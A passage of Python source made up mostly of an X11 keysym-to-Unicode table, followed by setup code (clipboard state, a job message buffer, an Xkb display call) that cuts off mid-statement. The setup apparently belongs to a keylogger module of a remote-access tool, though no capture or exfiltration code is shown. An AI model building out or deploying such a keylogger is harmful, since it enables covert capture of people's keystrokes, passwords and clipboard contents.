u'\\u044e', 0x06c1: u'\\u0430', 0x06c2: u'\\u0431', 0x06c3: u'\\u0446', 0x06c4: u'\\u0434', + 0x06c5: u'\\u0435', 0x06c6: u'\\u0444', 0x06c7: u'\\u0433', 0x06c8: u'\\u0445', 0x06c9: u'\\u0438', + 0x06ca: u'\\u0439', 0x06cb: u'\\u043a', 0x06cc: u'\\u043b', 0x06cd: u'\\u043c', 0x06ce: u'\\u043d', + 0x06cf: u'\\u043e', 0x06d0: u'\\u043f', 0x06d1: u'\\u044f', 0x06d2: u'\\u0440', 0x06d3: u'\\u0441', + 0x06d4: u'\\u0442', 0x06d5: u'\\u0443', 0x06d6: u'\\u0436', 0x06d7: u'\\u0432', 0x06d8: u'\\u044c', + 0x06d9: u'\\u044b', 0x06da: u'\\u0437', 0x06db: u'\\u0448', 0x06dc: u'\\u044d', 0x06dd: u'\\u0449', + 0x06de: u'\\u0447', 0x06df: u'\\u044a', 0x06e0: u'\\u042e', 0x06e1: u'\\u0410', 0x06e2: u'\\u0411', + 0x06e3: u'\\u0426', 0x06e4: u'\\u0414', 0x06e5: u'\\u0415', 0x06e6: u'\\u0424', 0x06e7: u'\\u0413', + 0x06e8: u'\\u0425', 0x06e9: u'\\u0418', 0x06ea: u'\\u0419', 0x06eb: u'\\u041a', 0x06ec: u'\\u041b', + 0x06ed: u'\\u041c', 0x06ee: u'\\u041d', 0x06ef: u'\\u041e', 0x06f0: u'\\u041f', 0x06f1: u'\\u042f', + 0x06f2: u'\\u0420', 0x06f3: u'\\u0421', 0x06f4: u'\\u0422', 0x06f5: u'\\u0423', 0x06f6: u'\\u0416', + 0x06f7: u'\\u0412', 0x06f8: u'\\u042c', 0x06f9: u'\\u042b', 0x06fa: u'\\u0417', 0x06fb: u'\\u0428', + 0x06fc: u'\\u042d', 0x06fd: u'\\u0429', 0x06fe: u'\\u0427', 0x06ff: u'\\u042a', 0x07a1: u'\\u0386', + 0x07a2: u'\\u0388', 0x07a3: u'\\u0389', 0x07a4: u'\\u038a', 0x07a5: u'\\u03aa', 0x07a7: u'\\u038c', + 0x07a8: u'\\u038e', 0x07a9: u'\\u03ab', 0x07ab: u'\\u038f', 0x07ae: u'\\u0385', 0x07af: u'\\u2015', + 0x07b1: u'\\u03ac', 0x07b2: u'\\u03ad', 0x07b3: u'\\u03ae', 0x07b4: u'\\u03af', 0x07b5: u'\\u03ca', + 0x07b6: u'\\u0390', 0x07b7: u'\\u03cc', 0x07b8: u'\\u03cd', 0x07b9: u'\\u03cb', 0x07ba: u'\\u03b0', + 0x07bb: u'\\u03ce', 0x07c1: u'\\u0391', 0x07c2: u'\\u0392', 0x07c3: u'\\u0393', 0x07c4: u'\\u0394', + 0x07c5: u'\\u0395', 0x07c6: u'\\u0396', 0x07c7: u'\\u0397', 0x07c8: u'\\u0398', 0x07c9: u'\\u0399', + 0x07ca: u'\\u039a', 0x07cb: u'\\u039b', 0x07cb: u'\\u039b', 0x07cc: u'\\u039c', 0x07cd: u'\\u039d', + 0x07ce: u'\\u039e', 0x07cf: u'\\u039f', 0x07d0: u'\\u03a0', 0x07d1: u'\\u03a1', 0x07d2: u'\\u03a3', + 0x07d4: u'\\u03a4', 0x07d5: u'\\u03a5', 0x07d6: u'\\u03a6', 0x07d7: u'\\u03a7', 0x07d8: u'\\u03a8', + 0x07d9: u'\\u03a9', 0x07e1: u'\\u03b1', 0x07e2: u'\\u03b2', 0x07e3: u'\\u03b3', 0x07e4: u'\\u03b4', + 0x07e5: u'\\u03b5', 0x07e6: u'\\u03b6', 0x07e7: u'\\u03b7', 0x07e8: u'\\u03b8', 0x07e9: u'\\u03b9', + 0x07ea: u'\\u03ba', 0x07eb: u'\\u03bb', 0x07ec: u'\\u03bc', 0x07ed: u'\\u03bd', 0x07ee: u'\\u03be', + 0x07ef: u'\\u03bf', 0x07f0: u'\\u03c0', 0x07f1: u'\\u03c1', 0x07f2: u'\\u03c3', 0x07f3: u'\\u03c2', + 0x07f4: u'\\u03c4', 0x07f5: u'\\u03c5', 0x07f6: u'\\u03c6', 0x07f7: u'\\u03c7', 0x07f8: u'\\u03c8', + 0x07f9: u'\\u03c9', 0x08a1: u'\\u23b7', 0x08a2: u'\\u250c', 0x08a3: u'\\u2500', 0x08a4: u'\\u2320', + 0x08a5: u'\\u2321', 0x08a6: u'\\u2502', 0x08a7: u'\\u23a1', 0x08a8: u'\\u23a3', 0x08a9: u'\\u23a4', + 0x08aa: u'\\u23a6', 0x08ab: u'\\u239b', 0x08ac: u'\\u239d', 0x08ad: u'\\u239e', 0x08ae: u'\\u23a0', + 0x08af: u'\\u23a8', 0x08b0: u'\\u23ac', 0x08bc: u'\\u2264', 0x08bd: u'\\u2260', 0x08be: u'\\u2265', + 0x08bf: u'\\u222b', 0x08c0: u'\\u2234', 0x08c1: u'\\u221d', 0x08c2: u'\\u221e', 0x08c5: u'\\u2207', + 0x08c8: u'\\u223c', 0x08c9: u'\\u2243', 0x08cd: u'\\u21d4', 0x08ce: u'\\u21d2', 0x08cf: u'\\u2261', + 0x08d6: u'\\u221a', 0x08da: u'\\u2282', 0x08db: u'\\u2283', 0x08dc: u'\\u2229', 0x08dd: u'\\u222a', + 0x08de: u'\\u2227', 0x08df: u'\\u2228', 0x08ef: u'\\u2202', 0x08f6: u'\\u0192', 0x08fb: u'\\u2190', + 0x08fc: u'\\u2191', 0x08fd: u'\\u2192', 0x08fe: u'\\u2193', 0x09e0: u'\\u25c6', 0x09e1: u'\\u2592', + 0x09e2: u'\\u2409', 0x09e3: u'\\u240c', 0x09e4: u'\\u240d', 0x09e5: u'\\u240a', 0x09e8: u'\\u2424', + 0x09e9: u'\\u240b', 0x09ea: u'\\u2518', 0x09eb: u'\\u2510', 0x09ec: u'\\u250c', 0x09ed: u'\\u2514', + 0x09ee: u'\\u253c', 0x09ef: u'\\u23ba', 0x09f0: u'\\u23bb', 0x09f1: u'\\u2500', 0x09f2: u'\\u23bc', + 0x09f3: u'\\u23bd', 0x09f4: u'\\u251c', 0x09f5: u'\\u2524', 0x09f6: u'\\u2534', 0x09f7: u'\\u252c', + 0x09f8: u'\\u2502', 0x0aa1: u'\\u2003', 0x0aa2: u'\\u2002', 0x0aa3: u'\\u2004', 0x0aa4: u'\\u2005', + 0x0aa5: u'\\u2007', 0x0aa6: u'\\u2008', 0x0aa7: u'\\u2009', 0x0aa8: u'\\u200a', 0x0aa9: u'\\u2014', + 0x0aaa: u'\\u2013', 0x0aac: u'\\u2423', 0x0aae: u'\\u2026', 0x0aaf: u'\\u2025', 0x0ab0: u'\\u2153', + 0x0ab1: u'\\u2154', 0x0ab2: u'\\u2155', 0x0ab3: u'\\u2156', 0x0ab4: u'\\u2157', 0x0ab5: u'\\u2158', + 0x0ab6: u'\\u2159', 0x0ab7: u'\\u215a', 0x0ab8: u'\\u2105', 0x0abb: u'\\u2012', 0x0abc: u'\\u27e8', + 0x0abd: u'\\u002e', 0x0abe: u'\\u27e9', 0x0ac3: u'\\u215b', 0x0ac4: u'\\u215c', 0x0ac5: u'\\u215d', + 0x0ac6: u'\\u215e', 0x0ac9: u'\\u2122', 0x0aca: u'\\u2613', 0x0acc: u'\\u25c1', 0x0acd: u'\\u25b7', + 0x0ace: u'\\u25cb', 0x0acf: u'\\u25af', 0x0ad0: u'\\u2018', 0x0ad1: u'\\u2019', 0x0ad2: u'\\u201c', + 0x0ad3: u'\\u201d', 0x0ad4: u'\\u211e', 0x0ad6: u'\\u2032', 0x0ad7: u'\\u2033', 0x0ad9: u'\\u271d', + 0x0adb: u'\\u25ac', 0x0adc: u'\\u25c0', 0x0add: u'\\u25b6', 0x0ade: u'\\u25cf', 0x0adf: u'\\u25ae', + 0x0ae0: u'\\u25e6', 0x0ae1: u'\\u25ab', 0x0ae2: u'\\u25ad', 0x0ae3: u'\\u25b3', 0x0ae4: u'\\u25bd', + 0x0ae5: u'\\u2606', 0x0ae6: u'\\u2022', 0x0ae7: u'\\u25aa', 0x0ae8: u'\\u25b2', 0x0ae9: u'\\u25bc', + 0x0aea: u'\\u261c', 0x0aeb: u'\\u261e', 0x0aec: u'\\u2663', 0x0aed: u'\\u2666', 0x0aee: u'\\u2665', + 0x0af0: u'\\u2720', 0x0af1: u'\\u2020', 0x0af2: u'\\u2021', 0x0af3: u'\\u2713', 0x0af4: u'\\u2717', + 0x0af5: u'\\u266f', 0x0af6: u'\\u266d', 0x0af7: u'\\u2642', 0x0af8: u'\\u2640', 0x0af9: u'\\u260e', + 0x0afa: u'\\u2315', 0x0afb: u'\\u2117', 0x0afc: u'\\u2038', 0x0afd: u'\\u201a', 0x0afe: u'\\u201e', + 0x0ba3: u'\\u003c', 0x0ba6: u'\\u003e', 0x0ba8: u'\\u2228', 0x0ba9: u'\\u2227', 0x0bc0: u'\\u00af', + 0x0bc2: u'\\u22a5', 0x0bc3: u'\\u2229', 0x0bc4: u'\\u230a', 0x0bc6: u'\\u005f', 0x0bca: u'\\u2218', + 0x0bcc: u'\\u2395', 0x0bce: u'\\u22a4', 0x0bcf: u'\\u25cb', 0x0bd3: u'\\u2308', 0x0bd6: u'\\u222a', + 0x0bd8: u'\\u2283', 0x0bda: u'\\u2282', 0x0bdc: u'\\u22a2', 0x0bfc: u'\\u22a3', 0x0cdf: u'\\u2017', + 0x0ce0: u'\\u05d0', 0x0ce1: u'\\u05d1', 0x0ce1: u'\\u05d1', 0x0ce2: u'\\u05d2', 0x0ce2: u'\\u05d2', + 0x0ce3: u'\\u05d3', 0x0ce3: u'\\u05d3', 0x0ce4: u'\\u05d4', 0x0ce5: u'\\u05d5', 0x0ce6: u'\\u05d6', + 0x0ce6: u'\\u05d6', 0x0ce7: u'\\u05d7', 0x0ce7: u'\\u05d7', 0x0ce8: u'\\u05d8', 0x0ce8: u'\\u05d8', + 0x0ce9: u'\\u05d9', 0x0cea: u'\\u05da', 0x0ceb: u'\\u05db', 0x0cec: u'\\u05dc', 0x0ced: u'\\u05dd', + 0x0cee: u'\\u05de', 0x0cef: u'\\u05df', 0x0cf0: u'\\u05e0', 0x0cf1: u'\\u05e1', 0x0cf1: u'\\u05e1', + 0x0cf2: u'\\u05e2', 0x0cf3: u'\\u05e3', 0x0cf4: u'\\u05e4', 0x0cf5: u'\\u05e5', 0x0cf5: u'\\u05e5', + 0x0cf6: u'\\u05e6', 0x0cf6: u'\\u05e6', 0x0cf7: u'\\u05e7', 0x0cf7: u'\\u05e7', 0x0cf8: u'\\u05e8', + 0x0cf9: u'\\u05e9', 0x0cfa: u'\\u05ea', 0x0cfa: u'\\u05ea', 0x0da1: u'\\u0e01', 0x0da2: u'\\u0e02', + 0x0da3: u'\\u0e03', 0x0da4: u'\\u0e04', 0x0da5: u'\\u0e05', 0x0da6: u'\\u0e06', 0x0da7: u'\\u0e07', + 0x0da8: u'\\u0e08', 0x0da9: u'\\u0e09', 0x0daa: u'\\u0e0a', 0x0dab: u'\\u0e0b', 0x0dac: u'\\u0e0c', + 0x0dad: u'\\u0e0d', 0x0dae: u'\\u0e0e', 0x0daf: u'\\u0e0f', 0x0db0: u'\\u0e10', 0x0db1: u'\\u0e11', + 0x0db2: u'\\u0e12', 0x0db3: u'\\u0e13', 0x0db4: u'\\u0e14', 0x0db5: u'\\u0e15', 0x0db6: u'\\u0e16', + 0x0db7: u'\\u0e17', 0x0db8: u'\\u0e18', 0x0db9: u'\\u0e19', 0x0dba: u'\\u0e1a', 0x0dbb: u'\\u0e1b', + 0x0dbc: u'\\u0e1c', 0x0dbd: u'\\u0e1d', 0x0dbe: u'\\u0e1e', 0x0dbf: u'\\u0e1f', 0x0dc0: u'\\u0e20', + 0x0dc1: u'\\u0e21', 0x0dc2: u'\\u0e22', 0x0dc3: u'\\u0e23', 0x0dc4: u'\\u0e24', 0x0dc5: u'\\u0e25', + 0x0dc6: u'\\u0e26', 0x0dc7: u'\\u0e27', 0x0dc8: u'\\u0e28', 0x0dc9: u'\\u0e29', 0x0dca: u'\\u0e2a', + 0x0dcb: u'\\u0e2b', 0x0dcc: u'\\u0e2c', 0x0dcd: u'\\u0e2d', 0x0dce: u'\\u0e2e', 0x0dcf: u'\\u0e2f', + 0x0dd0: u'\\u0e30', 0x0dd1: u'\\u0e31', 0x0dd2: u'\\u0e32', 0x0dd3: u'\\u0e33', 0x0dd4: u'\\u0e34', + 0x0dd5: u'\\u0e35', 0x0dd6: u'\\u0e36', 0x0dd7: u'\\u0e37', 0x0dd8: u'\\u0e38', 0x0dd9: u'\\u0e39', + 0x0dda: u'\\u0e3a', 0x0ddf: u'\\u0e3f', 0x0de0: u'\\u0e40', 0x0de1: u'\\u0e41', 0x0de2: u'\\u0e42', + 0x0de3: u'\\u0e43', 0x0de4: u'\\u0e44', 0x0de5: u'\\u0e45', 0x0de6: u'\\u0e46', 0x0de7: u'\\u0e47', + 0x0de8: u'\\u0e48', 0x0de9: u'\\u0e49', 0x0dea: u'\\u0e4a', 0x0deb: u'\\u0e4b', 0x0dec: u'\\u0e4c', + 0x0ded: u'\\u0e4d', 0x0df0: u'\\u0e50', 0x0df1: u'\\u0e51', 0x0df2: u'\\u0e52', 0x0df3: u'\\u0e53', + 0x0df4: u'\\u0e54', 0x0df5: u'\\u0e55', 0x0df6: u'\\u0e56', 0x0df7: u'\\u0e57', 0x0df8: u'\\u0e58', + 0x0df9: u'\\u0e59', 0x0ea1: u'\\u3131', 0x0ea2: u'\\u3132', 0x0ea3: u'\\u3133', 0x0ea4: u'\\u3134', + 0x0ea5: u'\\u3135', 0x0ea6: u'\\u3136', 0x0ea7: u'\\u3137', 0x0ea8: u'\\u3138', 0x0ea9: u'\\u3139', + 0x0eaa: u'\\u313a', 0x0eab: u'\\u313b', 0x0eac: u'\\u313c', 0x0ead: u'\\u313d', 0x0eae: u'\\u313e', + 0x0eaf: u'\\u313f', 0x0eb0: u'\\u3140', 0x0eb1: u'\\u3141', 0x0eb2: u'\\u3142', 0x0eb3: u'\\u3143', + 0x0eb4: u'\\u3144', 0x0eb5: u'\\u3145', 0x0eb6: u'\\u3146', 0x0eb7: u'\\u3147', 0x0eb8: u'\\u3148', + 0x0eb9: u'\\u3149', 0x0eba: u'\\u314a', 0x0ebb: u'\\u314b', 0x0ebc: u'\\u314c', 0x0ebd: u'\\u314d', + 0x0ebe: u'\\u314e', 0x0ebf: u'\\u314f', 0x0ec0: u'\\u3150', 0x0ec1: u'\\u3151', 0x0ec2: u'\\u3152', + 0x0ec3: u'\\u3153', 0x0ec4: u'\\u3154', 0x0ec5: u'\\u3155', 0x0ec6: u'\\u3156', 0x0ec7: u'\\u3157', + 0x0ec8: u'\\u3158', 0x0ec9: u'\\u3159', 0x0eca: u'\\u315a', 0x0ecb: u'\\u315b', 0x0ecc: u'\\u315c', + 0x0ecd: u'\\u315d', 0x0ece: u'\\u315e', 0x0ecf: u'\\u315f', 0x0ed0: u'\\u3160', 0x0ed1: u'\\u3161', + 0x0ed2: u'\\u3162', 0x0ed3: u'\\u3163', 0x0ed4: u'\\u11a8', 0x0ed5: u'\\u11a9', 0x0ed6: u'\\u11aa', + 0x0ed7: u'\\u11ab', 0x0ed8: u'\\u11ac', 0x0ed9: u'\\u11ad', 0x0eda: u'\\u11ae', 0x0edb: u'\\u11af', + 0x0edc: u'\\u11b0', 0x0edd: u'\\u11b1', 0x0ede: u'\\u11b2', 0x0edf: u'\\u11b3', 0x0ee0: u'\\u11b4', + 0x0ee1: u'\\u11b5', 0x0ee2: u'\\u11b6', 0x0ee3: u'\\u11b7', 0x0ee4: u'\\u11b8', 0x0ee5: u'\\u11b9', + 0x0ee6: u'\\u11ba', 0x0ee7: u'\\u11bb', 0x0ee8: u'\\u11bc', 0x0ee9: u'\\u11bd', 0x0eea: u'\\u11be', + 0x0eeb: u'\\u11bf', 0x0eec: u'\\u11c0', 0x0eed: u'\\u11c1', 0x0eee: u'\\u11c2', 0x0eef: u'\\u316d', + 0x0ef0: u'\\u3171', 0x0ef1: u'\\u3178', 0x0ef2: u'\\u317f', 0x0ef3: u'\\u3181', 0x0ef4: u'\\u3184', + 0x0ef5: u'\\u3186', 0x0ef6: u'\\u318d', 0x0ef7: u'\\u318e', 0x0ef8: u'\\u11eb', 0x0ef9: u'\\u11f0', + 0x0efa: u'\\u11f9', 0x0eff: u'\\u20a9', 0x13bc: u'\\u0152', 0x13bd: u'\\u0153', 0x13be: u'\\u0178', + 0x20a0: u'\\u20a0', 0x20a1: u'\\u20a1', 0x20a2: u'\\u20a2', 0x20a3: u'\\u20a3', 0x20a4: u'\\u20a4', + 0x20a5: u'\\u20a5', 0x20a6: u'\\u20a6', 0x20a7: u'\\u20a7', 0x20a8: u'\\u20a8', 0x20a9: u'\\u20a9', + 0x20aa: u'\\u20aa', 0x20ab: u'\\u20ab', 0x20ac: u'\\u20ac', 0xfe50: u'\\u0300', 0xfe51: u'\\u0301', + 0xfe52: u'\\u0302', 0xfe53: u'\\u0303', 0xfe54: u'\\u0304', 0xfe55: u'\\u0306', 0xfe56: u'\\u0307', + 0xfe57: u'\\u0308', 0xfe58: u'\\u030a', 0xfe59: u'\\u030b', 0xfe5a: u'\\u030c', 0xfe5b: u'\\u0327', + 0xfe5c: u'\\u0328', 0xfe5d: u'\\u0345', 0xfe5e: u'\\u3099', 0xfe5f: u'\\u309a', 0xff08: u'\\u0008', + 0xff09: u'\\u0009', 0xff0a: u'\\u000a', 0xff0b: u'\\u000b', 0xff0d: u'\\u000d', 0xff13: u'\\u0013', + 0xff14: u'\\u0014', 0xff15: u'\\u0015', 0xff1b: u'\\u001b', 0xff80: u'\\u0020', 0xff89: u'\\u0009', + 0xff8d: u'\\u000d', 0xffaa: u'\\u002a', 0xffab: u'\\u002b', 0xffac: u'\\u002c', 0xffad: u'\\u002d', + 0xffae: u'\\u002e', 0xffaf: u'\\u002f', 0xffb0: u'\\u0030', 0xffb1: u'\\u0031', 0xffb2: u'\\u0032', + 0xffb3: u'\\u0033', 0xffb4: u'\\u0034', 0xffb5: u'\\u0035', 0xffb6: u'\\u0036', 0xffb7: u'\\u0037', + 0xffb8: u'\\u0038', 0xffb9: u'\\u0039', 0xffbd: u'\\u003d', 0x06ad: u'\\u0491', 0x06bd: u'\\u0490', + 0x14a2: u'\\u0587', 0x14a3: u'\\u0589', 0x14a4: u'\\u0029', 0x14a5: u'\\u0028', 0x14a6: u'\\u00bb', + 0x14a7: u'\\u00ab', 0x14a8: u'\\u2014', 0x14a9: u'\\u002e', 0x14aa: u'\\u055d', 0x14ab: u'\\u002c', + 0x14ac: u'\\u2013', 0x14ad: u'\\u058a', 0x14ae: u'\\u2026', 0x14af: u'\\u055c', 0x14b0: u'\\u055b', + 0x14b1: u'\\u055e', 0x14b2: u'\\u0531', 0x14b3: u'\\u0561', 0x14b4: u'\\u0532', 0x14b5: u'\\u0562', + 0x14b6: u'\\u0533', 0x14b7: u'\\u0563', 0x14b8: u'\\u0534', 0x14b9: u'\\u0564', 0x14ba: u'\\u0535', + 0x14bb: u'\\u0565', 0x14bc: u'\\u0536', 0x14bd: u'\\u0566', 0x14be: u'\\u0537', 0x14bf: u'\\u0567', + 0x14c0: u'\\u0538', 0x14c1: u'\\u0568', 0x14c2: u'\\u0539', 0x14c3: u'\\u0569', 0x14c4: u'\\u053a', + 0x14c5: u'\\u056a', 0x14c6: u'\\u053b', 0x14c7: u'\\u056b', 0x14c8: u'\\u053c', 0x14c9: u'\\u056c', + 0x14ca: u'\\u053d', 0x14cb: u'\\u056d', 0x14cc: u'\\u053e', 0x14cd: u'\\u056e', 0x14ce: u'\\u053f', + 0x14cf: u'\\u056f', 0x14d0: u'\\u0540', 0x14d1: u'\\u0570', 0x14d2: u'\\u0541', 0x14d3: u'\\u0571', + 0x14d4: u'\\u0542', 0x14d5: u'\\u0572', 0x14d6: u'\\u0543', 0x14d7: u'\\u0573', 0x14d8: u'\\u0544', + 0x14d9: u'\\u0574', 0x14da: u'\\u0545', 0x14db: u'\\u0575', 0x14dc: u'\\u0546', 0x14dd: u'\\u0576', + 0x14de: u'\\u0547', 0x14df: u'\\u0577', 0x14e0: u'\\u0548', 0x14e1: u'\\u0578', 0x14e2: u'\\u0549', + 0x14e3: u'\\u0579', 0x14e4: u'\\u054a', 0x14e5: u'\\u057a', 0x14e6: u'\\u054b', 0x14e7: u'\\u057b', + 0x14e8: u'\\u054c', 0x14e9: u'\\u057c', 0x14ea: u'\\u054d', 0x14eb: u'\\u057d', 0x14ec: u'\\u054e', + 0x14ed: u'\\u057e', 0x14ee: u'\\u054f', 0x14ef: u'\\u057f', 0x14f0: u'\\u0550', 0x14f1: u'\\u0580', + 0x14f2: u'\\u0551', 0x14f3: u'\\u0581', 0x14f4: u'\\u0552', 0x14f5: u'\\u0582', 0x14f6: u'\\u0553', + 0x14f7: u'\\u0583', 0x14f8: u'\\u0554', 0x14f9: u'\\u0584', 0x14fa: u'\\u0555', 0x14fb: u'\\u0585', + 0x14fc: u'\\u0556', 0x14fd: u'\\u0586', 0x14fe: u'\\u055a', 0x14ff: u'\\u00a7', 0x15d0: u'\\u10d0', + 0x15d1: u'\\u10d1', 0x15d2: u'\\u10d2', 0x15d3: u'\\u10d3', 0x15d4: u'\\u10d4', 0x15d5: u'\\u10d5', + 0x15d6: u'\\u10d6', 0x15d7: u'\\u10d7', 0x15d8: u'\\u10d8', 0x15d9: u'\\u10d9', 0x15da: u'\\u10da', + 0x15db: u'\\u10db', 0x15dc: u'\\u10dc', 0x15dd: u'\\u10dd', 0x15de: u'\\u10de', 0x15df: u'\\u10df', + 0x15e0: u'\\u10e0', 0x15e1: u'\\u10e1', 0x15e2: u'\\u10e2', 0x15e3: u'\\u10e3', 0x15e4: u'\\u10e4', + 0x15e5: u'\\u10e5', 0x15e6: u'\\u10e6', 0x15e7: u'\\u10e7', 0x15e8: u'\\u10e8', 0x15e9: u'\\u10e9', + 0x15ea: u'\\u10ea', 0x15eb: u'\\u10eb', 0x15ec: u'\\u10ec', 0x15ed: u'\\u10ed', 0x15ee: u'\\u10ee', + 0x15ef: u'\\u10ef', 0x15f0: u'\\u10f0', 0x15f1: u'\\u10f1', 0x15f2: u'\\u10f2', 0x15f3: u'\\u10f3', + 0x15f4: u'\\u10f4', 0x15f5: u'\\u10f5', 0x15f6: u'\\u10f6', 0x12a1: u'\\u1e02', 0x12a2: u'\\u1e03', + 0x12a6: u'\\u1e0a', 0x12a8: u'\\u1e80', 0x12aa: u'\\u1e82', 0x12ab: u'\\u1e0b', 0x12ac: u'\\u1ef2', + 0x12b0: u'\\u1e1e', 0x12b1: u'\\u1e1f', 0x12b4: u'\\u1e40', 0x12b5: u'\\u1e41', 0x12b7: u'\\u1e56', + 0x12b8: u'\\u1e81', 0x12b9: u'\\u1e57', 0x12ba: u'\\u1e83', 0x12bb: u'\\u1e60', 0x12bc: u'\\u1ef3', + 0x12bd: u'\\u1e84', 0x12be: u'\\u1e85', 0x12bf: u'\\u1e61', 0x12d0: u'\\u0174', 0x12d7: u'\\u1e6a', + 0x12de: u'\\u0176', 0x12f0: u'\\u0175', 0x12f7: u'\\u1e6b', 0x12fe: u'\\u0177', 0x0590: u'\\u06f0', + 0x0591: u'\\u06f1', 0x0592: u'\\u06f2', 0x0593: u'\\u06f3', 0x0594: u'\\u06f4', 0x0595: u'\\u06f5', + 0x0596: u'\\u06f6', 0x0597: u'\\u06f7', 0x0598: u'\\u06f8', 0x0599: u'\\u06f9', 0x05a5: u'\\u066a', + 0x05a6: u'\\u0670', 0x05a7: u'\\u0679', 0x05a8: u'\\u067e', 0x05a9: u'\\u0686', 0x05aa: u'\\u0688', + 0x05ab: u'\\u0691', 0x05ae: u'\\u06d4', 0x05b0: u'\\u0660', 0x05b1: u'\\u0661', 0x05b2: u'\\u0662', + 0x05b3: u'\\u0663', 0x05b4: u'\\u0664', 0x05b5: u'\\u0665', 0x05b6: u'\\u0666', 0x05b7: u'\\u0667', + 0x05b8: u'\\u0668', 0x05b9: u'\\u0669', 0x05f3: u'\\u0653', 0x05f4: u'\\u0654', 0x05f5: u'\\u0655', + 0x05f6: u'\\u0698', 0x05f7: u'\\u06a4', 0x05f8: u'\\u06a9', 0x05f9: u'\\u06af', 0x05fa: u'\\u06ba', + 0x05fb: u'\\u06be', 0x05fc: u'\\u06cc', 0x05fd: u'\\u06d2', 0x05fe: u'\\u06c1', 0x0680: u'\\u0492', + 0x0681: u'\\u0496', 0x0682: u'\\u049a', 0x0683: u'\\u049c', 0x0684: u'\\u04a2', 0x0685: u'\\u04ae', + 0x0686: u'\\u04b0', 0x0687: u'\\u04b2', 0x0688: u'\\u04b6', 0x0689: u'\\u04b8', 0x068a: u'\\u04ba', + 0x068c: u'\\u04d8', 0x068d: u'\\u04e2', 0x068e: u'\\u04e8', 0x068f: u'\\u04ee', 0x0690: u'\\u0493', + 0x0691: u'\\u0497', 0x0692: u'\\u049b', 0x0693: u'\\u049d', 0x0694: u'\\u04a3', 0x0695: u'\\u04af', + 0x0696: u'\\u04b1', 0x0697: u'\\u04b3', 0x0698: u'\\u04b7', 0x0699: u'\\u04b9', 0x069a: u'\\u04bb', + 0x069c: u'\\u04d9', 0x069d: u'\\u04e3', 0x069e: u'\\u04e9', 0x069f: u'\\u04ef', 0x16a3: u'\\u1e8a', + 0x16a6: u'\\u012c', 0x16a9: u'\\u01b5', 0x16aa: u'\\u01e6', 0x16af: u'\\u019f', 0x16b3: u'\\u1e8b', + 0x16b6: u'\\u012d', 0x16b9: u'\\u01b6', 0x16ba: u'\\u01e7', 0x16bd: u'\\u01d2', 0x16bf: u'\\u0275', + 0x16c6: u'\\u018f', 0x16f6: u'\\u0259', 0x16d1: u'\\u1e36', 0x16e1: u'\\u1e37', 0x1ea0: u'\\u1ea0', + 0x1ea1: u'\\u1ea1', 0x1ea2: u'\\u1ea2', 0x1ea3: u'\\u1ea3', 0x1ea4: u'\\u1ea4', 0x1ea5: u'\\u1ea5', + 0x1ea6: u'\\u1ea6', 0x1ea7: u'\\u1ea7', 0x1ea8: u'\\u1ea8', 0x1ea9: u'\\u1ea9', 0x1eaa: u'\\u1eaa', + 0x1eab: u'\\u1eab', 0x1eac: u'\\u1eac', 0x1ead: u'\\u1ead', 0x1eae: u'\\u1eae', 0x1eaf: u'\\u1eaf', + 0x1eb0: u'\\u1eb0', 0x1eb1: u'\\u1eb1', 0x1eb2: u'\\u1eb2', 0x1eb3: u'\\u1eb3', 0x1eb4: u'\\u1eb4', + 0x1eb5: u'\\u1eb5', 0x1eb6: u'\\u1eb6', 0x1eb7: u'\\u1eb7', 0x1eb8: u'\\u1eb8', 0x1eb9: u'\\u1eb9', + 0x1eba: u'\\u1eba', 0x1ebb: u'\\u1ebb', 0x1ebc: u'\\u1ebc', 0x1ebd: u'\\u1ebd', 0x1ebe: u'\\u1ebe', + 0x1ebf: u'\\u1ebf', 0x1ec0: u'\\u1ec0', 0x1ec1: u'\\u1ec1', 0x1ec2: u'\\u1ec2', 0x1ec3: u'\\u1ec3', + 0x1ec4: u'\\u1ec4', 0x1ec5: u'\\u1ec5', 0x1ec6: u'\\u1ec6', 0x1ec7: u'\\u1ec7', 0x1ec8: u'\\u1ec8', + 0x1ec9: u'\\u1ec9', 0x1eca: u'\\u1eca', 0x1ecb: u'\\u1ecb', 0x1ecc: u'\\u1ecc', 0x1ecd: u'\\u1ecd', + 0x1ece: u'\\u1ece', 0x1ecf: u'\\u1ecf', 0x1ed0: u'\\u1ed0', 0x1ed1: u'\\u1ed1', 0x1ed2: u'\\u1ed2', + 0x1ed3: u'\\u1ed3', 0x1ed4: u'\\u1ed4', 0x1ed5: u'\\u1ed5', 0x1ed6: u'\\u1ed6', 0x1ed7: u'\\u1ed7', + 0x1ed8: u'\\u1ed8', 0x1ed9: u'\\u1ed9', 0x1eda: u'\\u1eda', 0x1edb: u'\\u1edb', 0x1edc: u'\\u1edc', + 0x1edd: u'\\u1edd', 0x1ede: u'\\u1ede', 0x1edf: u'\\u1edf', 0x1ee0: u'\\u1ee0', 0x1ee1: u'\\u1ee1', + 0x1ee2: u'\\u1ee2', 0x1ee3: u'\\u1ee3', 0x1ee4: u'\\u1ee4', 0x1ee5: u'\\u1ee5', 0x1ee6: u'\\u1ee6', + 0x1ee7: u'\\u1ee7', 0x1ee8: u'\\u1ee8', 0x1ee9: u'\\u1ee9', 0x1eea: u'\\u1eea', 0x1eeb: u'\\u1eeb', + 0x1eec: u'\\u1eec', 0x1eed: u'\\u1eed', 0x1eee: u'\\u1eee', 0x1eef: u'\\u1eef', 0x1ef0: u'\\u1ef0', + 0x1ef1: u'\\u1ef1', 0x1ef4: u'\\u1ef4', 0x1ef5: u'\\u1ef5', 0x1ef6: u'\\u1ef6', 0x1ef7: u'\\u1ef7', + 0x1ef8: u'\\u1ef8', 0x1ef9: u'\\u1ef9', 0x1efa: u'\\u01a0', 0x1efb: u'\\u01a1', 0x1efc: u'\\u01af', + 0x1efd: u'\\u01b0', 0x1e9f: u'\\u0303', 0x1ef2: u'\\u0300', 0x1ef3: u'\\u0301', 0x1efe: u'\\u0309', + 0x1eff: u'\\u0323', 0xfe60: u'\\u0323', 0xfe61: u'\\u0309', 0xfe62: u'\\u031b', + }.get(ks) + +class NotAvailable(Exception): + pass + +job_message_buffer(str(x11)+' '+str(xi)+'\\n') + +daemon = False +stopped = False +last_clipboard = "" +state = set() +group = 0 +level = 0 +display = None +x11 = x11 +xi = xi + +XkbEventCode = ct.c_int(0) +XkbErrorReturn = ct.c_int(0) +XkbMajorVersion = ct.c_int(1) +XkbMinorVersion = ct.c_int(0) +XkbReasonReturn = ct.c_int(0) + +if x11: + display = x11.XkbOpenDisplay( + None, + ct.pointer(XkbEventCode), ct.pointer(XkbErrorReturn), + ct.pointer(XkbMajorVersion), 